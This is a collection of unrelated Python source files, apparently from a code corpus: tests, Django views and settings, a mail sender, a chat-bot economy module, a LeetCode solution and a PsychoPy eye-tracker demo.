py | 1a389f552c4818c6424a4569fd1752ac3ff20814 | #!/usr/bin/env python
# Copyright (C) 2013 The Android Open Source Project
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import unittest
from util import resolve_url
class TestResolveUrl(unittest.TestCase):
""" run to test:
python -m unittest -v util_test
"""
def testKnown(self):
url = resolve_url('GERRIT:foo.jar', {})
self.assertEqual(url,
'http://gerrit-maven.storage.googleapis.com/foo.jar')
def testKnownRedirect(self):
url = resolve_url('MAVEN_CENTRAL:foo.jar',
{'MAVEN_CENTRAL': 'https://my.company.mirror/maven2'})
self.assertEqual(url, 'https://my.company.mirror/maven2/foo.jar')
def testCustom(self):
url = resolve_url('https://maven.example.com/release/foo.jar', {})
self.assertEqual(url, 'https://maven.example.com/release/foo.jar')
def testCustomRedirect(self):
url = resolve_url('MAVEN_EXAMPLE:foo.jar',
{'MAVEN_EXAMPLE':
'https://maven.example.com/release'})
self.assertEqual(url, 'https://maven.example.com/release/foo.jar')
if __name__ == '__main__':
unittest.main()
|
py | 1a389f9bf0d4dfbee2db5173721c62a0e31fb562 | from dash.orgs.views import OrgPermsMixin
from smartmin.views import SmartCreateView, SmartCRUDL, SmartDeleteView, SmartListView, SmartReadView, SmartUpdateView
from django.contrib.auth import update_session_auth_hash
from django.contrib.auth.models import User
from django.http import Http404, HttpResponse, JsonResponse
from django.urls import reverse
from django.utils.translation import ugettext_lazy as _
from casepro.cases.mixins import PartnerPermsMixin
from casepro.cases.models import Partner
from casepro.orgs_ext.mixins import OrgFormMixin
from casepro.statistics.models import DailyCount
from casepro.utils import month_range, str_to_bool
from .forms import OrgUserForm, PartnerUserForm, UserForm
from .models import Profile
class UserUpdateMixin(OrgFormMixin):
"""
Mixin for views that update user
"""
def get_form_kwargs(self):
kwargs = super().get_form_kwargs()
kwargs["user"] = self.get_user()
return kwargs
def derive_initial(self):
initial = super().derive_initial()
initial["name"] = self.object.profile.full_name
if self.request.org:
initial["role"] = self.object.get_role(self.request.org)
initial["partner"] = self.object.get_partner(self.request.org)
return initial
def post_save(self, obj):
obj = super().post_save(obj)
data = self.form.cleaned_data
obj.profile.full_name = data["name"]
obj.profile.change_password = data.get("change_password", False)
obj.profile.must_use_faq = data.get("must_use_faq", False)
obj.profile.save(update_fields=("full_name", "change_password", "must_use_faq"))
if "role" in data:
role = data["role"]
partner = data["partner"] if "partner" in data else self.get_partner()
obj.update_role(self.request.org, role, partner)
# set new password if provided
password = data["new_password"]
if password:
obj.set_password(password)
obj.save()
update_session_auth_hash(self.request, obj)
return obj
class UserCRUDL(SmartCRUDL):
model = User
actions = ("create", "create_in", "update", "read", "self", "delete", "list")
class Create(OrgPermsMixin, OrgFormMixin, SmartCreateView):
"""
Form used by org admins to create any kind of user, and used by superusers to create unattached users
"""
permission = "profiles.profile_user_create"
success_url = "@profiles.user_list"
def get_form_class(self):
return OrgUserForm if self.request.org else UserForm
def get_form_kwargs(self):
kwargs = super().get_form_kwargs()
kwargs["user"] = self.get_user()
return kwargs
def derive_fields(self):
if self.request.org:
return (
"name",
"role",
"partner",
"email",
"password",
"confirm_password",
"change_password",
"must_use_faq",
)
else:
return "name", "email", "password", "confirm_password", "change_password", "must_use_faq"
def save(self, obj):
org = self.request.org
name = self.form.cleaned_data["name"]
email = self.form.cleaned_data["email"]
password = self.form.cleaned_data["password"]
change_password = self.form.cleaned_data["change_password"]
must_use_faq = self.form.cleaned_data["must_use_faq"]
if org:
role = self.form.cleaned_data["role"]
partner = self.form.cleaned_data["partner"]
if partner:
self.object = Profile.create_partner_user(
org, partner, role, name, email, password, change_password, must_use_faq
)
else:
self.object = Profile.create_org_user(org, name, email, password, change_password, must_use_faq)
else:
self.object = Profile.create_user(name, email, password, change_password, must_use_faq)
def get_success_url(self):
return reverse("profiles.user_read", args=[self.object.pk])
class CreateIn(PartnerPermsMixin, OrgFormMixin, SmartCreateView):
"""
Form for creating partner-level users in a specific partner
"""
permission = "profiles.profile_user_create_in"
form_class = PartnerUserForm
fields = ("name", "role", "email", "password", "confirm_password", "change_password", "must_use_faq")
@classmethod
def derive_url_pattern(cls, path, action):
return r"^user/create_in/(?P<partner_id>\d+)/$"
def get_form_kwargs(self):
kwargs = super().get_form_kwargs()
kwargs["user"] = self.get_user()
return kwargs
def get_partner(self):
return Partner.get_all(self.request.org).get(pk=self.kwargs["partner_id"])
def save(self, obj):
org = self.request.org
partner = self.get_partner()
role = self.form.cleaned_data["role"]
name = self.form.cleaned_data["name"]
email = self.form.cleaned_data["email"]
password = self.form.cleaned_data["password"]
change_password = self.form.cleaned_data["change_password"]
must_use_faq = self.form.cleaned_data["must_use_faq"]
self.object = Profile.create_partner_user(
org, partner, role, name, email, password, change_password, must_use_faq
)
def get_success_url(self):
return reverse("profiles.user_read", args=[self.object.pk])
class Update(PartnerPermsMixin, UserUpdateMixin, SmartUpdateView):
"""
Form for updating any kind of user by another user
"""
permission = "profiles.profile_user_update"
form_class = UserForm
def get_form_class(self):
if self.request.org:
if self.request.user.get_partner(self.request.org):
return PartnerUserForm
else:
return OrgUserForm
else:
return UserForm
def get_queryset(self):
if self.request.org:
return self.request.org.get_users()
else:
return super().get_queryset()
def get_partner(self):
return self.get_object().get_partner(self.request.org)
def derive_fields(self):
profile_fields = ["name"]
user_fields = ["email", "new_password", "confirm_password", "change_password", "must_use_faq"]
if self.request.org:
user_partner = self.request.user.get_partner(self.request.org)
if user_partner:
profile_fields += ["role"] # partner users can't change a user's partner
else:
profile_fields += ["role", "partner"]
return tuple(profile_fields + user_fields)
def get_success_url(self):
return reverse("profiles.user_read", args=[self.object.pk])
class Self(OrgPermsMixin, UserUpdateMixin, SmartUpdateView):
"""
Limited update form for users to edit their own profiles
"""
form_class = UserForm
fields = ("name", "email", "current_password", "new_password", "confirm_password")
success_url = "@cases.inbox"
success_message = _("Profile updated")
title = _("Edit My Profile")
@classmethod
def derive_url_pattern(cls, path, action):
return r"^profile/self/$"
def has_permission(self, request, *args, **kwargs):
return self.request.user.is_authenticated
def get_form_kwargs(self):
kwargs = super().get_form_kwargs()
kwargs["user"] = self.get_user()
kwargs["require_password_change"] = self.object.profile.change_password
return kwargs
def get_object(self, queryset=None):
if not self.request.user.has_profile():
raise Http404(_("User doesn't have a profile"))
return self.request.user
def post_save(self, obj):
obj = super().post_save(obj)
obj.profile.change_password = False
obj.profile.save(update_fields=("change_password",))
return obj
class Read(OrgPermsMixin, SmartReadView):
permission = "profiles.profile_user_read"
def derive_title(self):
if self.object == self.request.user:
return _("My Profile")
else:
return super().derive_title()
def derive_fields(self):
profile_fields = ["name"]
user_fields = ["email"]
if self.request.org:
user_partner = self.request.user.get_partner(self.request.org)
if user_partner:
profile_fields += ["role"] # partner users can't change a user's partner
else:
profile_fields += ["role", "partner"]
return tuple(profile_fields + user_fields)
def get_queryset(self):
if self.request.org:
user_partner = self.request.user.get_partner(self.request.org)
if user_partner:
return user_partner.get_users()
return self.request.org.get_users()
else:
return super().get_queryset()
def get_context_data(self, **kwargs):
context = super().get_context_data(**kwargs)
org = self.request.org
user = self.request.user
if self.object == user:
edit_button_url = reverse("profiles.user_self")
can_delete = False # can't delete yourself
elif user.can_edit(org, self.object):
edit_button_url = reverse("profiles.user_update", args=[self.object.pk])
can_delete = bool(org) # can only delete in context of an org
else:
edit_button_url = None
can_delete = False
context["context_data_json"] = {"user": self.object.as_json(full=True, org=org)}
context["edit_button_url"] = edit_button_url
context["can_delete"] = can_delete
context["summary"] = self.get_summary(org, self.object) if org else {}
return context
def get_summary(self, org, user):
return {"total_replies": DailyCount.get_by_user(org, [user], DailyCount.TYPE_REPLIES, None, None).total()}
class Delete(OrgPermsMixin, SmartDeleteView):
cancel_url = "@profiles.user_list"
def has_permission(self, request, *args, **kwargs):
user = self.get_object()
return request.user.can_edit(request.org, user) and request.user != user
def get_queryset(self):
return self.request.org.get_users()
def post(self, request, *args, **kwargs):
user = self.get_object()
user.remove_from_org(request.org)
return HttpResponse(status=204)
class List(OrgPermsMixin, SmartListView):
"""
JSON endpoint to fetch users with their activity information
"""
permission = "profiles.profile_user_list"
def get(self, request, *args, **kwargs):
org = request.org
partner_id = request.GET.get("partner")
non_partner = str_to_bool(self.request.GET.get("non_partner", ""))
with_activity = str_to_bool(self.request.GET.get("with_activity", ""))
if non_partner:
users = org.administrators.all()
elif partner_id:
users = Partner.objects.get(org=org, pk=partner_id).get_users()
else:
users = org.get_users()
users = list(users.order_by("profile__full_name"))
# get reply statistics
if with_activity:
replies_total = DailyCount.get_by_user(org, users, DailyCount.TYPE_REPLIES, None, None).scope_totals()
replies_this_month = DailyCount.get_by_user(
org, users, DailyCount.TYPE_REPLIES, *month_range(0)
).scope_totals()
replies_last_month = DailyCount.get_by_user(
org, users, DailyCount.TYPE_REPLIES, *month_range(-1)
).scope_totals()
cases_total = DailyCount.get_by_user(
org, users, DailyCount.TYPE_CASE_OPENED, None, None
).scope_totals()
cases_opened_this_month = DailyCount.get_by_user(
org, users, DailyCount.TYPE_CASE_OPENED, *month_range(0)
).scope_totals()
cases_closed_this_month = DailyCount.get_by_user(
org, users, DailyCount.TYPE_CASE_CLOSED, *month_range(0)
).scope_totals()
def as_json(user):
obj = user.as_json(full=True, org=org)
if with_activity:
obj.update(
{
"replies": {
"this_month": replies_this_month.get(user, 0),
"last_month": replies_last_month.get(user, 0),
"total": replies_total.get(user, 0),
},
"cases": {
"opened_this_month": cases_opened_this_month.get(user, 0),
"closed_this_month": cases_closed_this_month.get(user, 0),
"total": cases_total.get(user, 0),
},
}
)
return obj
return JsonResponse({"results": [as_json(u) for u in users]})
|
py | 1a38a0578ee147127c0d08ad5f5620229ee3626e | from enum import Enum
RACE_OR_HISPANIC_COL = "race_and_ethnicity"
HISPANIC_COL = "hispanic_or_latino"
RACE_COL = "race"
AGE_COL = "age"
SEX_COL = "sex"
STATE_FIPS_COL = "state_fips"
STATE_NAME_COL = "state_name"
COUNTY_FIPS_COL = "county_fips"
COUNTY_NAME_COL = "county_name"
POPULATION_COL = "population"
# TODO add Asian/Pacific Islander combined, and Indigenous combined
class Race(Enum):
AIAN = "American Indian and Alaska Native"
AIAN_NH = "American Indian and Alaska Native (Non-Hispanic)"
ASIAN = "Asian"
ASIAN_NH = "Asian (Non-Hispanic)"
BLACK = "Black or African American"
BLACK_NH = "Black or African American (Non-Hispanic)"
HISP = "Hispanic or Latino"
NHPI = "Native Hawaiian and Pacific Islander"
NHPI_NH = "Native Hawaiian and Pacific Islander (Non-Hispanic)"
NH = "Not Hispanic or Latino"
OTHER = "Some other race"
OTHER_NH = "Some other race (Non-Hispanic)"
TOTAL = "Total"
MULTI = "Two or more races"
MULTI_NH = "Two or more races (Non-Hispanic)"
WHITE = "White"
WHITE_NH = "White (Non-Hispanic)"
|
py | 1a38a1ba622f8c2c31d8144f6e07551267efd1e6 | #!/usr/bin/env python3
# Copyright (c) Facebook, Inc. and its affiliates. All Rights Reserved
from .char_embedding import CharacterEmbedding
from .contextual_token_embedding import ContextualTokenEmbedding
from .dict_embedding import DictEmbedding
from .embedding_base import EmbeddingBase
from .embedding_list import EmbeddingList
from .mlp_embedding import MLPEmbedding
from .word_embedding import WordEmbedding
from .word_seq_embedding import WordSeqEmbedding
__all__ = [
"EmbeddingBase",
"EmbeddingList",
"WordEmbedding",
"DictEmbedding",
"CharacterEmbedding",
"ContextualTokenEmbedding",
"WordSeqEmbedding",
"MLPEmbedding",
]
|
py | 1a38a1bf20343bad2e418c197ab64270307dbbb8 | from langumo.building.base import Builder, BuildPipeline
from langumo.building.miscellaneous import (ImportFrom, ExportTo, Residual,
StackOutputs)
from langumo.building.parsing import Parser, ParseRawFile
from langumo.building.shuffling import ShuffleLines
from langumo.building.tokenization import TrainTokenizer, TokenizeSentences
from langumo.building.splitting import SplitValidation
from langumo.building.mergence import MergeFiles
|
py | 1a38a250c06d13588e03a8fed990a16441dc209a | class Cud():
def __init__(self):
#print("__init__ called")
pass
def __repr__(self):
print("__repr__ called")
return ""
def __lt__(self, other):
print("__lt__ called")
def __le__(self, other):
print("__le__ called")
def __eq__(self, other):
print("__eq__ called")
def __ne__(self, other):
print("__ne__ called")
def __ge__(self, other):
print("__ge__ called")
def __gt__(self, other):
print("__gt__ called")
def __abs__(self):
print("__abs__ called")
def __add__(self, other):
print("__add__ called")
def __and__(self, other):
print("__and__ called")
def __floordiv__(self, other):
print("__floordiv__ called")
def __index__(self, other):
print("__index__ called")
def __inv__(self):
print("__inv__ called")
def __invert__(self):
print("__invert__ called")
def __lshift__(self, val):
print("__lshift__ called")
def __mod__(self, val):
print("__mod__ called")
def __mul__(self, other):
print("__mul__ called")
def __matmul__(self, other):
print("__matmul__ called")
def __neg__(self):
print("__neg__ called")
def __or__(self, other):
print("__or__ called")
def __pos__(self):
print("__pos__ called")
def __pow__(self, val):
print("__pow__ called")
def __rshift__(self, val):
print("__rshift__ called")
def __sub__(self, other):
print("__sub__ called")
def __truediv__(self, other):
print("__truediv__ called")
def __div__(self, other):
print("__div__ called")
def __xor__(self, other):
print("__xor__ called")
def __iadd__(self, other):
print("__iadd__ called")
return self
def __isub__(self, other):
print("__isub__ called")
return self
def __dir__(self):
return ['a', 'b', 'c']
cud1 = Cud()
cud2 = Cud()
try:
+cud1
except TypeError:
print("SKIP")
raise SystemExit
# the following require MICROPY_PY_ALL_SPECIAL_METHODS
+cud1
-cud1
~cud1
cud1 * cud2
cud1 / cud2
cud2 // cud1
cud1 += cud2
cud1 -= cud2
# test that dir() delegates to __dir__ special method
print(dir(cud1))
# test that dir() does not delegate to __dir__ for the type
print('a' in dir(Cud))
# TODO: the following operations are not supported on every ports
#
# ne is not supported, !(eq) is called instead
#cud1 != cud2
#
# binary and is not supported
# cud1 & cud2
#
# binary lshift is not supported
# cud1<<1
#
# modulus is not supported
# cud1 % 2
#
# binary or is not supported
# cud1 | cud2
#
# pow is not supported
# cud1**2
#
# rshift is not suported
# cud1>>1
#
# xor is not supported
# cud1^cud2
#
# in the followin test, cpython still calls __eq__
# cud3=cud1
# cud3==cud1
|
py | 1a38a317d0eec493c94bf753d9e903d2ffd57739 | #!/usr/bin/env python3
"""
Read a class-averages .mrcs file and save each average as a .jpg,
automatically removing the empty edges.
INPUT: mrcs file of 2D class averages
OUTPUT: a dir for the jpg output
The name of the jpg file would be "particlename_diamxxkxx_classnumber.jpg"
"""
import os
import mrcfile
import numpy as np
from PIL import Image
import argparse
import shutil
from . import imgprep
# from .lib import utils
def setupParserOptions():
ap = argparse.ArgumentParser()
ap.add_argument('-i', '--input',
help="Input mrcs file of 2D class averages.")
ap.add_argument('-n', '--name', default='particle',
help="Name of the particle")
ap.add_argument('-o', '--output', default='2DAssess',
help="Output jpg dir.")
args = vars(ap.parse_args())
return args
def mrcs2jpg(args):
print('Converting mrcs to jpg....')
os.chdir(os.path.abspath(os.path.dirname(args['input']))) # navigate to the par dir of input file
try:
shutil.rmtree(args['output'])
except OSError:
pass
os.mkdir(args['output'])
os.mkdir(os.path.join(args['output'], 'data'))
avg_mrc = mrcfile.open(os.path.basename(args['input'])).data
if len(avg_mrc.shape) == 3:
num_part = avg_mrc.shape[0]
elif len(avg_mrc.shape) == 2:
num_part = 1
for i in range(num_part):
new_img = avg_mrc[i,:,:]
if np.sum(new_img) > 1e-7 or np.sum(new_img) < -1e-7:
new_img = imgprep.cutByRadius(new_img)
new_img = ((new_img-new_img.min())/((new_img.max()-new_img.min())+1e-7)*255).astype('uint8')
new_img = Image.fromarray(new_img)
new_img = new_img.convert("L")
new_img.save(os.path.join(args['output'], 'data', (args['name'] + '_' + str(i+1) + '.jpg')))
if __name__ == '__main__':
args = setupParserOptions()
mrcs2jpg(args)
|
py | 1a38a32e9a984012d7a5ce255d06711175e0f298 | import smtplib
import ast
import getpass
import sys
#ENTER DETAILS BELOW
DEFAULT_RECIPIENT = ''
pwd = ""
def send_mail(mailfile,SUBJECT,recipient = DEFAULT_RECIPIENT):
if recipient == '.':
recipient = DEFAULT_RECIPIENT
s = smtplib.SMTP('smtp.gmail.com', 587)
s.starttls()
s.login(DEFAULT_RECIPIENT, str(pwd))
if mailfile == '.':
mailfile = "my_mail_auto.txt"
f = open(mailfile,'w')
f.write("Test Mail")
f.close()
f = open(mailfile,'r')
TEXT = f.read()
f.close()
message = 'Subject: {}\n\n{}'.format(SUBJECT, TEXT)
s.sendmail(DEFAULT_RECIPIENT, recipient, message)
s.quit()
if __name__ == '__main__':
if len(sys.argv)<3:
print("Check number of arguments: py mail_sender.py mailfile(.) subjectstr recepient") #recipient argument is mandatory
sys.exit(-1)
send_mail(sys.argv[1]," ".join(sys.argv[2:-1]),sys.argv[-1])
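# Example: python mail_sender.py . "Test subject" recipient@example.com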
|
py | 1a38a3637d60dd9b23b957fb88a407a2638187e3 | ##############################################################################
#
# Copyright (c) 2005 Zope Foundation and Contributors.
# All Rights Reserved.
#
# This software is subject to the provisions of the Zope Public License,
# Version 2.1 (ZPL). A copy of the ZPL should accompany this distribution.
# THIS SOFTWARE IS PROVIDED "AS IS" AND ANY AND ALL EXPRESS OR IMPLIED
# WARRANTIES ARE DISCLAIMED, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
# WARRANTIES OF TITLE, MERCHANTABILITY, AGAINST INFRINGEMENT, AND FITNESS
# FOR A PARTICULAR PURPOSE.
#
##############################################################################
"""Tests class initialization.
"""
def test_InitializeClass():
"""Test that InitializeClass (default__class_init__)
works in specific corner cases.
Check when the class has an ExtensionClass as attribute.
>>> import ExtensionClass
>>> from AccessControl.class_init import InitializeClass
>>> class AnotherClass(ExtensionClass.Base):
... _need__name__ = 1
>>> class C:
... foo = AnotherClass
>>> InitializeClass(C)
"""
from doctest import DocTestSuite
import unittest
def test_suite():
return unittest.TestSuite((
DocTestSuite(),
))
|
py | 1a38a514b12707cf0d751b97c056318f3a3caf78 | """
Django settings for app project.
Generated by 'django-admin startproject' using Django 2.1.15.
For more information on this file, see
https://docs.djangoproject.com/en/2.1/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/2.1/ref/settings/
"""
import os
# Build paths inside the project like this: os.path.join(BASE_DIR, ...)
BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/2.1/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
SECRET_KEY = 'z0l9u3^wdjp04fog#4cu*c4f%z^-k0jcrxyb6s#0p0)jyzr2x2'
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = True
ALLOWED_HOSTS = []
# Application definition
INSTALLED_APPS = [
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
'rest_framework',
'rest_framework.authtoken',
"main",
'user',
]
MIDDLEWARE = [
'django.middleware.security.SecurityMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
]
ROOT_URLCONF = 'app.urls'
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': [],
'APP_DIRS': True,
'OPTIONS': {
'context_processors': [
'django.template.context_processors.debug',
'django.template.context_processors.request',
'django.contrib.auth.context_processors.auth',
'django.contrib.messages.context_processors.messages',
],
},
},
]
WSGI_APPLICATION = 'app.wsgi.application'
# Database
# https://docs.djangoproject.com/en/2.1/ref/settings/#databases
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.postgresql',
'HOST': os.environ.get('DB_HOST'),
'NAME': os.environ.get('DB_NAME'),
'USER': os.environ.get('DB_USER'),
'PASSWORD': os.environ.get('DB_PASS')
}
}
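# The database settings above read their values from the environment. A minimal
# sketch of the variables this configuration expects (values are placeholders,
# e.g. for a docker-compose service or a local shell):
#
#   DB_HOST=localhost
#   DB_NAME=app
#   DB_USER=postgres
#   DB_PASS=supersecretpassword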
# Password validation
# https://docs.djangoproject.com/en/2.1/ref/settings/#auth-password-validators
AUTH_PASSWORD_VALIDATORS = [
{
'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',
},
]
# Internationalization
# https://docs.djangoproject.com/en/2.1/topics/i18n/
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'UTC'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/2.1/howto/static-files/
STATIC_URL = '/static/'
AUTH_USER_MODEL = 'main.User' |
py | 1a38a542d4601752471a77dfeaef7ccd2ec7316d | #!/usr/bin/env python
from setuptools import setup, find_packages
import pystashlog
import pathlib
HERE = pathlib.Path(__file__).parent.resolve()
# Get the long description from the README file
long_description = (HERE / 'README.md').read_text(encoding='utf-8')
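# Typical local workflow for this package (commands are illustrative; the
# 'build' package must be installed separately for the second one):
#   pip install .
#   python -m build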
setup(
name='pystashlog',
version=pystashlog.__version__,
description='Logstash client library for Python',
long_description=long_description,
long_description_content_type='text/markdown',
url='https://github.com/wuriyanto48/pystashlog',
author='wuriyanto',
author_email='[email protected]',
classifiers=[
'Development Status :: 3 - Alpha',
'Intended Audience :: Developers',
'Topic :: Software Development :: Libraries :: Python Modules',
'License :: OSI Approved :: MIT License',
'Programming Language :: Python :: 3',
'Programming Language :: Python :: 3.5',
'Programming Language :: Python :: 3.6',
'Programming Language :: Python :: 3.7',
'Programming Language :: Python :: 3.8',
'Programming Language :: Python :: 3 :: Only',
],
keywords='logstash, elk, elastic, logstash client, kibana',
packages=find_packages(exclude=['tests*', 'env', 'elk', '_examples']),
python_requires='>=3.5',
project_urls={
'Bug Reports': 'https://github.com/wuriyanto48/pystashlog/issues',
'Source': 'https://github.com/wuriyanto48/pystashlog/',
},
) |
py | 1a38a57dad6b297bd7ec0c324bf412da6f2ca602 | import voltage
from voltage.ext import commands
import random
from utils import get_db, check_account, cooldown
# (name, multiplier)
people = [
("Enoki", 1),
("Insert", 1.2),
("NotJan", 0.9),
("Jan", 1),
("Delta", 1.2),
("z3", 0.1),
("atal", 1.5),
("Fatal", 1.2),
]
# (message, (min, max), weight)
scenarios = [
("{name} saw you begging and graciously gave you {amount} SusCoins.", (1, 100), 1),
("WOW, {name} gave you {amount} SusCoins for because they're like very kind and stuff.", (50, 100), 0.8),
]
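# random.choices (used in `beg` below) picks one scenario with probability
# proportional to its weight, so the first message above is drawn roughly
# 1/1.8 ~= 56% of the time and the second roughly 44%. Illustrative call:
#   random.choices(scenarios, weights=[s[2] for s in scenarios])[0]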
def setup(client) -> commands.Cog:
economy = commands.Cog("Economy", "Simple economy commands.")
@check_account()
@economy.command(aliases=['bal', 'b'])
async def balance(ctx):
"""Check your balance."""
conn = get_db()
cur = conn.cursor()
cur.execute("SELECT balance FROM economy WHERE user_id = ?", (ctx.author.id,))
bal = cur.fetchone()[0]
await ctx.reply(f"Your balance is **__{bal}__** SusCoins.")
# @cooldown("beg", 20)
@check_account()
@economy.command()
async def beg(ctx):
"""Beg for money."""
conn = get_db()
cur = conn.cursor()
cur.execute("SELECT balance FROM economy WHERE user_id = ?", (ctx.author.id,))
bal = cur.fetchone()[0]
person = random.choice(people)
scenario = random.choices(scenarios, weights=[x[2] for x in scenarios])[0]
amount = int(random.randint(scenario[1][0], scenario[1][1]) * person[1])
cur.execute("UPDATE economy SET balance = balance + ? WHERE user_id = ?", (amount, ctx.author.id))
conn.commit()
cur.close()
conn.close()
await ctx.reply(scenario[0].format(name=f"**{person[0]}**", amount=f"**__{amount}__**"))
return economy
|
py | 1a38a87c531b74362f6f9bcb12a3ae77b0ebf8f3 | # 107. Binary Tree Level Order Traversal II
# [email protected]
# Given a binary tree, return the bottom-up level order traversal of its nodes' values. (ie, from left to right, level by level from leaf to root).
# For example:
# Given binary tree [3,9,20,null,null,15,7],
# 3
# / \
# 9 20
# / \
# 15 7
# return its bottom-up level order traversal as:
# [
# [15,7],
# [9,20],
# [3]
# ]
# Definition for a binary tree node.
# class TreeNode(object):
# def __init__(self, x):
# self.val = x
# self.left = None
# self.right = None
import collections

class Solution(object):
def levelOrderBottom(self, root):
"""
:type root: TreeNode
:rtype: List[List[int]]
"""
# sol 1:
# BFS iterative
# runtime: 48ms
if not root:
return []
queue = [root]
res = []
while queue:
vals = [node.val if node else None for node in queue]
res.append(vals)
queue = [leaf for q in queue for leaf in (q.left, q.right) if leaf]
return res[::-1]
        # sol 2 (kept for reference; unreachable after the return in sol 1 above)
        # iterative DFS with explicit depth bookkeeping (despite the original
        # "BFS" label, popping from the end of the list makes this a stack)
        # runtime: 47ms
if not root:
return []
queue = [(root, 0)]
res = collections.defaultdict(list)
while queue:
node, depth = queue.pop()
res[depth].append(node.val)
if node.right:
queue.append((node.right, depth + 1))
if node.left:
queue.append((node.left, depth + 1))
        return list(res.values())[::-1]
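
# A small self-check for the tree from the problem statement above. TreeNode is
# assumed to match the commented-out definition and is re-declared here only to
# keep the sketch self-contained.
if __name__ == '__main__':
    class TreeNode(object):
        def __init__(self, x):
            self.val = x
            self.left = None
            self.right = None

    root = TreeNode(3)
    root.left = TreeNode(9)
    root.right = TreeNode(20)
    root.right.left = TreeNode(15)
    root.right.right = TreeNode(7)
    print(Solution().levelOrderBottom(root))  # [[15, 7], [9, 20], [3]]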
|
py | 1a38a8968148bebe9c64a86d397fd9618862bf03 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
"""
Simple iohub eye tracker device demo.
Select which tracker to use by setting the TRACKER variable below.
"""
from __future__ import absolute_import, division, print_function
from psychopy import core, visual
from psychopy.iohub import launchHubServer
from psychopy.iohub.util import hideWindow, showWindow
# Eye tracker to use ('mouse', 'eyelink', 'gazepoint', or 'tobii')
TRACKER = 'mouse'
eyetracker_config = dict(name='tracker')
devices_config = {}
if TRACKER == 'mouse':
devices_config['eyetracker.hw.mouse.EyeTracker'] = eyetracker_config
elif TRACKER == 'eyelink':
eyetracker_config['model_name'] = 'EYELINK 1000 DESKTOP'
eyetracker_config['runtime_settings'] = dict(sampling_rate=1000, track_eyes='RIGHT')
devices_config['eyetracker.hw.sr_research.eyelink.EyeTracker'] = eyetracker_config
elif TRACKER == 'gazepoint':
devices_config['eyetracker.hw.gazepoint.gp3.EyeTracker'] = eyetracker_config
elif TRACKER == 'tobii':
devices_config['eyetracker.hw.tobii.EyeTracker'] = eyetracker_config
else:
print("{} is not a valid TRACKER name; please use 'mouse', 'eyelink', 'gazepoint', or 'tobii'.".format(TRACKER))
core.quit()
# Number of 'trials' to run in the demo
TRIAL_COUNT = 2
# Maximum trial time / trial timeout (seconds)
T_MAX = 60.0
win = visual.Window((1920, 1080),
units='pix',
fullscr=True,
allowGUI=False,
colorSpace='rgb255',
monitor='55w_60dist',
color=[128, 128, 128]
)
win.setMouseVisible(False)
text_stim = visual.TextStim(win, text="Start of Experiment",
pos=[0, 0], height=24,
color='black', units='pix', colorSpace='named',
wrapWidth=win.size[0] * .9)
text_stim.draw()
win.flip()
io = launchHubServer(window=win, **devices_config)
# Get some iohub devices for future access.
keyboard = io.getDevice('keyboard')
tracker = io.getDevice('tracker')
# Minimize the PsychoPy window if needed
hideWindow(win)
# Display calibration gfx window and run calibration.
result = tracker.runSetupProcedure()
print("Calibration returned: ", result)
# Maximize the PsychoPy window if needed
showWindow(win)
gaze_ok_region = visual.Circle(win, lineColor='black', radius=300, units='pix', colorSpace='named')
gaze_dot = visual.GratingStim(win, tex=None, mask='gauss', pos=(0, 0),
size=(40, 40), color='green', colorSpace='named', units='pix')
text_stim_str = 'Eye Position: %.2f, %.2f. In Region: %s\n'
text_stim_str += 'Press space key to start next trial.'
missing_gpos_str = 'Eye Position: MISSING. In Region: No\n'
missing_gpos_str += 'Press space key to start next trial.'
text_stim.setText(text_stim_str)
# Run Trials.....
t = 0
while t < TRIAL_COUNT:
io.clearEvents()
tracker.setRecordingState(True)
run_trial = True
tstart_time = core.getTime()
while run_trial is True:
# Get the latest gaze position in display coord space.
gpos = tracker.getLastGazePosition()
# Update stim based on gaze position
valid_gaze_pos = isinstance(gpos, (tuple, list))
gaze_in_region = valid_gaze_pos and gaze_ok_region.contains(gpos)
if valid_gaze_pos:
# If we have a gaze position from the tracker, update gc stim and text stim.
if gaze_in_region:
gaze_in_region = 'Yes'
else:
gaze_in_region = 'No'
text_stim.text = text_stim_str % (gpos[0], gpos[1], gaze_in_region)
gaze_dot.setPos(gpos)
else:
# Otherwise just update text stim
text_stim.text = missing_gpos_str
# Redraw stim
gaze_ok_region.draw()
text_stim.draw()
if valid_gaze_pos:
gaze_dot.draw()
# Display updated stim on screen.
flip_time = win.flip()
# Check any new keyboard char events for a space key.
# If one is found, set the trial end variable.
#
if keyboard.getPresses(keys=' '):
run_trial = False
        elif core.getTime() - tstart_time > T_MAX:
run_trial = False
win.flip()
# Current Trial is Done
# Stop eye data recording
tracker.setRecordingState(False)
t += 1
# All Trials are done
# End experiment
win.close()
tracker.setConnectionState(False)
io.quit()
core.quit()
|
py | 1a38a9882a9bbc9a0339f823ee2a244dc597ef5a | from copy import deepcopy
from typing import List

